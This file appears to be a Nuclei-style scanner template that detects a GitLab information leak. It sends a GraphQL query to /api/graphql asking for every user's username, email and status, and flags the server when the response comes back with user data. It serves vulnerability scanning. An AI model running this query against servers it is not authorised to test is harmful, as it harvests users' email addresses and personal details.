id: gitlab-infoleak

info:
  name: Gitlab InfoLeaks
  author: pikpikcu
  severity: low
  reference: https://gitlab.com/gitlab-org/gitlab/-/issues/244275
  tags: gitlab,disclosure


requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/graphql"
    headers:
      Content-Type: application/json
    body: |
      {
        "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
        "variables": null,
        "operationName": null
      }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - "avatarUrl"
        condition: and

      - type: status
        status:
          - 200
